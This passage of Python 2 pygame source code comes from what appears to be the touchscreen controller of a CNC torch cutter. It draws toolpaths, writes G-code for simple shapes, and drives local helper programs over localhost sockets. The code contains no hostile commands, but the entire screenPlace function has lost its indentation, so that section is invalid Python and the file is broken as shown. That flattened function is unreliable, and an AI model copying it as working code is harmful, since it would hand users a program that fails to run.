        if ((int(xb)==(int(x)+1)) and (int(yb)==(int(y)+1))):
            gz.write('2 ')
            gz.write(str(count))
            gz.write('\n')
        if ((int(xb)==(int(x))) and (int(yb)==(int(y)+1))):
            gz.write('3 ')
            gz.write(str(count))
            gz.write('\n')
        if ((int(xb)==(int(x)-1)) and (int(yb)==(int(y)+1))):
            gz.write('4 ')
            gz.write(str(count))
            gz.write('\n')
        if ((int(xb)==(int(x)-1)) and (int(yb)==(int(y)))):
            gz.write('5 ')
            gz.write(str(count))
            gz.write('\n')
        if ((int(xb)==(int(x)-1)) and (int(yb)==(int(y)-1))):
            gz.write('6 ')
            gz.write(str(count))
            gz.write('\n')
        if ((int(xb)==(int(x))) and (int(yb)==(int(y)-1))):
            gz.write('7 ')
            gz.write(str(count))
            gz.write('\n')
        if ((int(xb)==(int(x)+1)) and (int(yb)==(int(y)-1))):
            gz.write('8 ')
            gz.write(str(count))
            gz.write('\n')
        count=count+1
        xb=x
        yb=y
    #pygame.display.update()
    g.close()
    gz.close()
def gdraw2(stx,sty,scale,col):
    """Draw the pixel-quantised path from motion/stepz.txt onto DISPLAYSURF.

    Each input line is "<dir> <n>"; unit steps are used (sx=-1 mirrors the
    path horizontally relative to gdraw). Torch-on segments use *col*,
    torch-off moves use DARKGRAY.
    """
    #Draw Gcode on screen
    #sc=getscale(590,540)
    sclx=1.176
    scly=1
    xoff=10.0;
    yoff=550.0;
    togg=False;
    #print (sc[0],sc[1],sc[2])
    stp_file=os.path.join(main_dir, 'motion' ,'stepz.txt')
    g = open(stp_file, "r")
    #sx=scale*sclx
    sx=-1
    #sy=scale*scly
    sy=1
    x=stx+xoff
    y=yoff-sty
    xb=stx+xoff
    yb=yoff-sty
    for line1 in g:
        line,lineC = line1.split()   # lineC (source index) is unused here
        if (line=='3'):
            y=y-sy
        elif (line=='4'):
            x=x-sx
            y=y-sy
        elif (line=='7'):
            y=y+sy
        elif (line=='8'):
            x=x+sx
            y=y+sy
        elif (line=='1'):
            x=x+sx
        elif (line=='2'):
            x=x+sx
            y=y-sy
        elif (line=='5'):
            x=x-sx
        elif (line=='6'):
            x=x-sx
            y=y+sy
        elif (line=='9'):
            togg=True
        elif (line=='0'):
            togg=False
        if (togg==True):
            colo = col
        else:
            colo = DARKGRAY
        if not ((int(xb)==int(x)) and (int(yb)==int(y))):
            pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
        xb=x
        yb=y
    pygame.display.update()
    g.close()
def dgdraw(stx,sty,scale,linS,linE):
    """Incrementally draw lines [linS, linE) of motion/stepd.txt.

    The pen position persists between calls in the function attributes
    dgdraw.xoff / dgdraw.yoff (callers reset them to start a new pass).
    linE == -1 means the job finished: hand off to end_tourch().
    Torch-on segments are BLUE, off-moves YELLOW.
    """
    #Draw Diffrential Gcode on screen
    sclx=1.176
    scly=1
    togg=False
    stp_file=os.path.join(main_dir, 'motion' ,'stepd.txt')
    sx=scale*sclx
    sy=scale*scly
    x=stx+dgdraw.xoff
    y=dgdraw.yoff-sty
    xb=stx+dgdraw.xoff
    yb=dgdraw.yoff-sty
    #linecache.checkcache(stp_file)
    if linE == (-1) :
        end_tourch(stx,sty,scale)
        return
    for ln in range(linS,linE):
        # linecache gives random access to a file that is still being written
        line = linecache.getline(stp_file, ln)
        if (line=='3\n'):
            y=y-sy
        elif (line=='4\n'):
            x=x-sx
            y=y-sy
        elif (line=='7\n'):
            y=y+sy
        elif (line=='8\n'):
            x=x+sx
            y=y+sy
        elif (line=='1\n'):
            x=x+sx
        elif (line=='2\n'):
            x=x+sx
            y=y-sy
        elif (line=='5\n'):
            x=x-sx
        elif (line=='6\n'):
            x=x-sx
            y=y+sy
        elif (line=='9\n'):
            togg=True
        elif (line=='0\n'):
            togg=False
        if (togg==True):
            colo = BLUE
        else:
            colo = YELLOW
        if not ((int(xb)==int(x)) and (int(yb)==int(y))):
            pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
        xb=x
        yb=y
    pygame.display.update()
    # remember where the pen ended, relative to the stx/sty offsets
    dgdraw.xoff=xb-stx;
    dgdraw.yoff=yb+sty;
def dgdraw2(stx,sty,scale,linS,linE):
    """Incrementally draw the pixel-quantised path (motion/stepz.txt).

    Like dgdraw(), but each line is "<dir> <n>" and drawing stops once the
    source-step index n exceeds linE; the last index seen is kept in
    dgdraw2.line_n and the pen position in dgdraw2.xoff / dgdraw2.yoff.
    linE == -1 means the job finished: hand off to end_tourch().
    """
    #Draw Diffrential Gcode on screen
    sclx=1.176
    scly=1
    togg=False
    stp_file=os.path.join(main_dir, 'motion' ,'stepz.txt')
    sx=-1#scale*sclx
    sy=1#scale*scly
    x=stx+dgdraw2.xoff
    y=dgdraw2.yoff-sty
    xb=stx+dgdraw2.xoff
    yb=dgdraw2.yoff-sty
    #linecache.checkcache(stp_file)
    if linE == (-1) :
        end_tourch(stx,sty,scale)
        return
    for ln in range(linS,linE):
        line = linecache.getline(stp_file, ln)
        if not line: break   # ran past the end of the file
        line1,line2 = line.split()
        dgdraw2.line_n = int(line2)
        if(int(line2)>linE):
            break   # this pixel belongs to a step the machine hasn't reached yet
        if (line1=='3'):
            y=y-sy
        elif (line1=='4'):
            x=x-sx
            y=y-sy
        elif (line1=='7'):
            y=y+sy
        elif (line1=='8'):
            x=x+sx
            y=y+sy
        elif (line1=='1'):
            x=x+sx
        elif (line1=='2'):
            x=x+sx
            y=y-sy
        elif (line1=='5'):
            x=x-sx
        elif (line1=='6'):
            x=x-sx
            y=y+sy
        elif (line1=='9'):
            togg=True
        elif (line1=='0'):
            togg=False
        if (togg==True):
            colo = BLUE
        else:
            colo = YELLOW
        if not ((int(xb)==int(x)) and (int(yb)==int(y))):
            pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
        xb=x
        yb=y
    pygame.display.update()
    dgdraw2.xoff=xb-stx;
    dgdraw2.yoff=yb+sty;
    # drop cached file contents so the next call re-reads the growing file
    linecache.clearcache()
def update_tourch(stx,sty,scale):
    """Poll the motion server for progress and redraw the finished portion.

    The connected socket lives in the function attribute update_tourch.ls.
    Sends '1' (query) then '0' (ack); the reply is the last completed line
    number, or -1 when the job is done. Returns False once done, else True.
    """
    update_tourch.ls.sendall('1')
    linN =update_tourch.ls.recv(8)
    update_tourch.ls.sendall('0')
    #print 'line No from Server:',(linN.strip('\0'))
    #print 'line No from Server:',int(linN.strip('\0'))
    #dgdraw.xoff=10.0;
    #dgdraw.yoff=550.0;
    #dgdraw(stx,sty,scale,1,int(linN.strip('\0')))
    # restart the incremental drawer from the path origin
    dgdraw2.xoff=10.0;
    dgdraw2.yoff=550.0;
    dgdraw2.line_n=0;
    line_c = int(linN.strip('\0'))
    if (line_c >= dgdraw2.line_n) or line_c == -1 :
        dgdraw2(stx,sty,scale,1,line_c)
    if ( int(linN.strip('\0'))==(-1)):
        return False
    else:
        return True
def pause_tourch():
    """Toggle pause on the motion server (command '2').

    Returns True when the server answers RESUME, False on PAUSE.
    NOTE(review): any other reply falls through and returns None implicitly.
    """
    update_tourch.ls.sendall('2')
    linN =update_tourch.ls.recv(8)
    print 'Status:'+linN
    if linN.strip('\0') == 'RESUME':
        print 'YES'
        return True
    if linN.strip('\0') == 'PAUSE':
        return False
def stop_tourch():
    """Send the stop command ('16') to the motion server and log its reply."""
    update_tourch.ls.sendall('16')
    linN =update_tourch.ls.recv(8)
    print 'Status:'+linN
def end_tourch(dstx,dsty,dscale):
    """Finish a job: stop the server ('16') and redraw the full path in BLUE."""
    update_tourch.ls.sendall('16')
    gdraw2(dstx,dsty,dscale,BLUE)
    print 'Status: END'
def circle2g(setting):
    """Write gcode/circle.txt: a circle as two G2 arcs.

    setting[0] is the radius; the /2 relies on Python 2 integer division.
    """
    #Radius
    fo = open(os.path.join("gcode" ,"circle.txt"), "w+")
    print "GCODE Written"
    fo.write('G%d X%d Y%d I%d J%d\n' % (2,setting[0],0,setting[0]/2,0))
    fo.write('G%d X%d Y%d I%d J%d\n' % (2,-setting[0],0,-setting[0]/2,0))
    fo.write('END')
    # Close opend file
    fo.close()
def rectangle2g(setting):
    """Write gcode/rect.txt: four G1 moves tracing a closed rectangle.

    setting[0] is the length (x), setting[1] the height (y); moves are
    relative, returning to the start point.
    """
    #Length, Hieght
    fo = open(os.path.join("gcode" ,"rect.txt"), "w+")
    print "GCODE Written"
    fo.write('G%d X%d Y%d\n' % (1,setting[0],0))
    fo.write('G%d X%d Y%d\n' % (1,0,setting[1]))
    fo.write('G%d X%d Y%d\n' % (1,-setting[0],0))
    fo.write('G%d X%d Y%d\n' % (1,0,-setting[1]))
    fo.write('END')
    # Close opend file
    fo.close()
def rhombus2g(setting):
    """Write gcode/rhom.txt: four G1 moves tracing a rhombus.

    setting[0]/setting[1] are the x/y diagonals; the /2 relies on Python 2
    integer division.
    """
    #Diagonal_x,Diagonal_y
    fo = open(os.path.join("gcode" ,"rhom.txt"), "w+")
    print "GCODE Written"
    fo.write('G%d X%d Y%d\n' % (1,setting[0]/2,setting[1]/2))
    fo.write('G%d X%d Y%d\n' % (1,-setting[0]/2,setting[1]/2))
    fo.write('G%d X%d Y%d\n' % (1,-setting[0]/2,-setting[1]/2))
    fo.write('G%d X%d Y%d\n' % (1,setting[0]/2,-setting[1]/2))
    fo.write('END')
    # Close opend file
    fo.close()
def triangle2g(setting):
    """Write gcode/tri.txt: three relative G1 moves tracing a triangle.

    setting = [base, height, apex x-offset from the start point].
    """
    #Base,Hieght,vertex_x
    fo = open(os.path.join("gcode" ,"tri.txt"), "w+")
    print "GCODE Written"
    fo.write('G%d X%d Y%d\n' % (1,setting[0],0))
    fo.write('G%d X%d Y%d\n' % (1,setting[2]-setting[0],setting[1]))
    fo.write('G%d X%d Y%d\n' % (1,-setting[2],-setting[1]))
    fo.write('END')
    # Close opend file
    fo.close()
def polygon2g(setting):
    """Write gcode/poly.txt: a regular N-gon as relative G1 moves.

    setting = [N, circumscribed radius]; each move is the chord between
    consecutive vertices on the circle.
    """
    #N,Radius
    fo = open(os.path.join("gcode" ,"poly.txt"), "w+")
    print "GCODE Written"
    angle = 0
    for i in range(setting[0]):
        # delta to the next vertex at angle + 2*pi/N
        d = [setting[1]*(math.cos(angle+2*math.pi/setting[0])-math.cos(angle)),setting[1]*(math.sin(angle+2*math.pi/setting[0])-math.sin(angle))]
        fo.write('G%d X%f Y%f\n' % (1,d[0],d[1]))
        angle += 2*math.pi/setting[0]
    fo.write('END')
    # Close opend file
    fo.close()
def star2g(setting):
    """Write gcode/star.txt: an N-pointed star as relative G1 moves.

    setting = [N, inner radius, outer radius]; the radii are swapped every
    half-step so the path alternates between inner and outer vertices.
    """
    #N,Inner_R,Outer_R
    fo = open(os.path.join("gcode" ,"star.txt"), "w+")
    print "GCODE Written"
    angle = 0
    R1 = setting[1]
    R2 = setting[2]
    for i in range(2*setting[0]):
        # delta from the current vertex (radius R2) to the next (radius R1)
        d = [R1*math.cos(angle+math.pi/setting[0])-R2*math.cos(angle),R1*math.sin(angle+math.pi/setting[0])-R2*math.sin(angle)]
        fo.write('G%d X%f Y%f\n' % (1,d[0],d[1]))
        angle += math.pi/setting[0]
        # alternate the radii for the next segment
        R=R1
        R1=R2
        R2=R
    fo.write('END')
    # Close opend file
    fo.close()
def screenCali():
    """Calibration flow: show four target images (right/left/top/bottom) and
    wait for a click on each, then recompute the scale and return to home.

    NOTE(review): dstx/dsty/dscale are assigned without `global`, so the
    module-level values set elsewhere are NOT updated here — confirm intended.
    """
    #Home screen to salect basic options
    image_arr = [os.path.join(main_dir, 'data', 'cr.png'), os.path.join(main_dir, 'data', 'cl.png'), os.path.join(main_dir, 'data', 'ct.png'), os.path.join(main_dir, 'data', 'cb.png')]
    for i in range(4):
        SIMAGE = pygame.image.load(image_arr[i])
        DISPLAYSURF.blit(SIMAGE, (0, 0))
        loop = True
        pygame.display.update()
        # block until the user clicks (or quits) on this calibration target
        while loop :
            event = pygame.event.wait()
            if event.type == QUIT:
                pygame.quit()
                sys.exit()
            elif event.type == KEYUP:
                if event.key == K_ESCAPE:
                    pygame.quit()
                    sys.exit()
            elif event.type == MOUSEBUTTONUP:
                screenNeedsRedraw = True # screen should be redrawn
                loop=False
    # refit the path, regenerate the quantised steps and redraw
    dstx,dsty,dscale=getscale(590,540)
    get_stpz(dstx,dsty,dscale)
    gdraw2(dstx,dsty,dscale,WHITE)
    screenHome()
def screenHome():
    """Home screen: draw the background, the part preview and five buttons
    (Run / Shapes / Setup / Gcode / USB), then loop on input events.

    BUTTONn are the drawn rectangles; BUTTONns are the hit-test copies,
    mirrored when XINV / YINV are set (touch panel inversion).
    """
    #Home screen to salect basic options
    global dstx,dsty,dscale
    image_file = os.path.join(main_dir, 'data', 'home.png')
    SIMAGE = pygame.image.load(image_file)
    DISPLAYSURF.blit(SIMAGE, (0, 0))
    BUTTON1 = (630,0,170,114)
    BUTTON1s = [630,0,170,114]
    BUTTON2 = (630,121,170,114)
    BUTTON2s = [630,121,170,114]
    BUTTON3 = (630,242,170,114)
    BUTTON3s = [630,242,170,114]
    BUTTON4 = (630,366,170,114)
    BUTTON4s = [630,366,170,114]
    BUTTON5 = (630,488,170,114)
    BUTTON5s = [630,488,170,114]
    screenNeedsRedraw = True
    # mirror the hit boxes when the input axes are inverted
    if XINV == True:
        BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
        BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
        BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
        BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
        BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
    if YINV == True:
        BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
        BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
        BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
        BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
        BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
    #dstx,dsty,dscale=getscale(590,540)
    #get_stpz(dstx,dsty,dscale)
    print str(dstx)+", "+str(dsty)+", "+str(dscale)
    gdraw2(dstx,dsty,dscale,WHITE)
    while True:
        if screenNeedsRedraw:
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
            pygame.display.update()
        FPSCLOCK.tick(300)
        screenNeedsRedraw = False # by default, don't redraw the screen
        event = pygame.event.wait()
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            screenNeedsRedraw = True # screen should be redrawn
            mousex, mousey = event.pos # syntactic sugar
            # check for clicks on the difficulty buttons
            if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
                print 'HOME RUN'
                screenRun()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON1,2)
            elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
                print 'HOME SHAPES'
                screenShapes()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON2,2)
            elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
                print 'HOME SETUP'
                screenSetup()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON3,2)
            elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
                print 'HOME GCODE'
                screenGcode()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON4,2)
            elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
                print 'HOME USB'
                screenUsb()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON5,2)
            pygame.display.update()
def screenRun():
    """Run screen: start/pause/stop execution of the loaded G-code.

    START spawns the external fdma.exe / intr_fdma.exe helpers and
    opens a localhost socket to them; while FDMAR is True the loop
    polls events (instead of blocking) so update_tourch() can keep
    streaming torch-position updates.
    """
    # Run screen to run Gcode.
    global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
    global FDMAR
    image_file = os.path.join(main_dir, 'data', 'run.png')
    SIMAGE = pygame.image.load(image_file)
    DISPLAYSURF.blit(SIMAGE, (0, 0))
    # Draw rects (tuples) and mirrored hit-test rects (lists).
    BUTTON1 = (630,0,170,114)
    BUTTON1s = [630,0,170,114]
    BUTTON2 = (630,121,170,114)
    BUTTON2s = [630,121,170,114]
    BUTTON3 = (630,242,170,114)
    BUTTON3s = [630,242,170,114]
    BUTTON4 = (630,366,170,114)
    BUTTON4s = [630,366,170,114]
    BUTTON5 = (630,488,170,114)
    BUTTON5s = [630,488,170,114]
    screenNeedsRedraw = True
    if XINV == True:
        BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
        BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
        BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
        BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
        BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
    if YINV == True:
        BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
        BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
        BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
        BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
        BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
    gdraw2(dstx,dsty,dscale,WHITE)
    # Reset the working step file from the pristine copy before a run.
    spath = os.path.join(main_dir, "motion", "step1.txt" )
    dpath = os.path.join(main_dir, "motion", "stepd.txt" )
    cpsd = 'cp -f '+ spath + ' ' + dpath
    os.system(cpsd)
    linecache.checkcache(dpath)
    while True:
        if screenNeedsRedraw:
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
            pygame.display.update()
        FPSCLOCK.tick(300)
        screenNeedsRedraw = False # by default, don't redraw the screen
        # While a run is active, poll for up to ~90ms so the torch
        # position keeps updating; otherwise block on the next event.
        if (FDMAR == True):
            for num in range(1,10):
                event = pygame.event.poll()
                if event.type == MOUSEBUTTONUP:
                    break
                time.delay(10)
        else:
            event = pygame.event.wait()
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            screenNeedsRedraw = True # screen should be redrawn
            mousex, mousey = event.pos # syntactic sugar
            # check for clicks on the run-control buttons
            if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
                print 'RUN HOME'
                screenHome()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON1,2)
            elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
                print 'RUN PLACE'
                screenPlace()
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON2,2)
            elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
                # START: spawn the motion helpers and connect to them.
                dgdraw2.xoff=10.0;
                dgdraw2.yoff=550.0;
                print 'RUN START'
                os.system("./intr_fdma.exe 8989&")
                os.system('sudo ./fdma.exe 10000&') #TODO
                FDMAR = True
                time.delay(100)
                # Socket kept as a function attribute so update_tourch
                # can reach it across calls.
                update_tourch.ls=socket.socket()
                update_tourch.ls.connect(('localhost',8989))
                update_tourch.ls.sendall('Communication Start')
                print 'fdma.exe is executed'
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON3,2)
            elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
                FDMAR = False
                FDMAR=pause_tourch()
                print 'RUN PAUSE'
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON4,2)
            elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
                # STOP: close the socket, then kill both helpers.
                #stop_tourch()
                print 'RUN STOP'
                time.delay(200)
                update_tourch.ls.close()
                time.delay(200)
                os.system('sudo pkill fdma.exe') #TODO
                os.system('sudo pkill intr_fdma.exe') #TODO
                FDMAR = False
                #update_tourch.ls.shutdown(socket.SHUT_RDWR)
                pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON5,2)
                screenHome()
            pygame.display.update()
        else:
            # No click this cycle: stream the next torch update.
            if FDMAR == True :
                FDMAR=update_tourch(dstx,dsty,dscale)
                if (FDMAR == False):
                    update_tourch.ls.close()
def screenPlace():
#Place screen to place tourch
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
image_file = os.path.join(main_dir, 'data', 'place.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
os.system('sudo ./place.exe&')
os.system("./intrcon.exe 8899 &")
time.delay(200)
#pi=pigpio.pi()
#os.system('sudo pigs m 18 w')
#pi.set_mode(18,pigpio.OUTPUT)
#pi.set_mode(23,pigpio.OUTPUT)
#pi.set_mode(24,pigpio.OUTPUT)
#pi.set_mode(25,pigpio.OUTPUT)
#os.system('sudo pigs m 23 w')
#os.system('sudo pigs m 24 w')
#os.system('sudo pigs m 25 w')
BUTTON1 = (630,0,170,114)
BUTTON1s = [630,0,170,114]
BUTTON2 = (630,121,170,114)
BUTTON2s = [630,121,170,114]
BUTTON3 = (630,242,170,114)
BUTTON3s = [630,242,170,114]
BUTTON4 = (630,366,170,114)
BUTTON4s = [630,366,170,114]
BUTTON5 = (630,488,170,114)
BUTTON5s = [630,488,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
ls=socket.socket()
ls.connect(('localhost',8899))
ls.sendall('Communication Start')
while True:
if screenNeedsRedraw:
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
print 'QUIT'
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
print 'QUIT'
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP :
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
#print pygame.mouse.get_pressed()
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
ls.sendall('16')
time.delay(200)
ls.close()
print 'PLACE BACK'
screenRun()
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON1,2)
elif pygame.mouse.get_pressed() == (1,0,0):
mousex, mousey = event.pos # syntactic sugar
if pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
ls.sendall('1')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE UP'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON2,2)
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
ls.sendall('4')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE RIGHT'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON3,2)
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
ls.sendall('8')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE LEFT'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON4,2)
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
ls.sendall('2')
msg=ls.recv(2);
print 'CLIENT:' + msg
print 'PLACE DOWN'
pygame.draw.rect(DISPLAYSURF,COLOR_ON,BUTTON5,2)
else:
ls.sendall('0')
print 'PLACE DOWN'
pygame.display.update()
def screenShapes():
    """Shape picker screen: a 4x3 grid of predefined shape buttons.

    Each populated cell opens screenSetsh() with the matching shape
    code ('cir', 'rec', 'sta', 'rho', 'tri', 'pol'); CANCEL returns
    to the home screen.  'Blank' cells are reserved grid positions.
    """
    # Shapes screen to select predefined shapes.
    global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
    image_file = os.path.join(main_dir, 'data', 'shapes.png')
    SIMAGE = pygame.image.load(image_file)
    DISPLAYSURF.blit(SIMAGE, (0, 0))
    #Circle
    BUTTON1 = (19,18,142,142)
    BUTTON1s = [19,18,142,142]
    #Rectangle
    BUTTON2 = (225,18,142,142)
    BUTTON2s = [225,18,142,142]
    #Star
    BUTTON3 = (433,18,142,142)
    BUTTON3s = [433,18,142,142]
    #Blank
    BUTTON4 = (638,18,142,142)
    BUTTON4s = [638,18,142,142]
    #Rhombus
    BUTTON5 = (19,218,142,142)
    BUTTON5s = [19,218,142,142]
    #Triangle
    BUTTON6 = (225,218,142,142)
    BUTTON6s = [225,218,142,142]
    #Polygon
    BUTTON7 = (433,218,142,142)
    BUTTON7s = [433,218,142,142]
    #Blank
    BUTTON8 = (638,218,142,142)
    BUTTON8s = [638,218,142,142]
    #Blank
    BUTTON9 = (19,418,142,142)
    BUTTON9s = [19,418,142,142]
    #Blank
    BUTTON10 = (225,418,142,142)
    BUTTON10s = [225,418,142,142]
    #Blank
    BUTTON11 = (433,418,142,142)
    BUTTON11s = [433,418,142,142]
    #Cancel
    BUTTON12 = (638,418,142,142)
    BUTTON12s = [638,418,142,142]
    screenNeedsRedraw = True
    # Mirror hit-test rects for inverted touch panels.
    if XINV == True:
        BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
        BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
        BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
        BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
        BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
        BUTTON6s[0] = WINDOWWIDTH - BUTTON6s[0] - BUTTON6s[2]
        BUTTON7s[0] = WINDOWWIDTH - BUTTON7s[0] - BUTTON7s[2]
        BUTTON8s[0] = WINDOWWIDTH - BUTTON8s[0] - BUTTON8s[2]
        BUTTON9s[0] = WINDOWWIDTH - BUTTON9s[0] - BUTTON9s[2]
        BUTTON10s[0] = WINDOWWIDTH - BUTTON10s[0] - BUTTON10s[2]
        BUTTON11s[0] = WINDOWWIDTH - BUTTON11s[0] - BUTTON11s[2]
        BUTTON12s[0] = WINDOWWIDTH - BUTTON12s[0] - BUTTON12s[2]
    if YINV == True:
        BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
        BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
        BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
        BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
        BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
        BUTTON6s[1] = WINDOWHEIGHT - BUTTON6s[1] - BUTTON6s[3]
        BUTTON7s[1] = WINDOWHEIGHT - BUTTON7s[1] - BUTTON7s[3]
        BUTTON8s[1] = WINDOWHEIGHT - BUTTON8s[1] - BUTTON8s[3]
        BUTTON9s[1] = WINDOWHEIGHT - BUTTON9s[1] - BUTTON9s[3]
        BUTTON10s[1] = WINDOWHEIGHT - BUTTON10s[1] - BUTTON10s[3]
        BUTTON11s[1] = WINDOWHEIGHT - BUTTON11s[1] - BUTTON11s[3]
        BUTTON12s[1] = WINDOWHEIGHT - BUTTON12s[1] - BUTTON12s[3]
    while True:
        if screenNeedsRedraw:
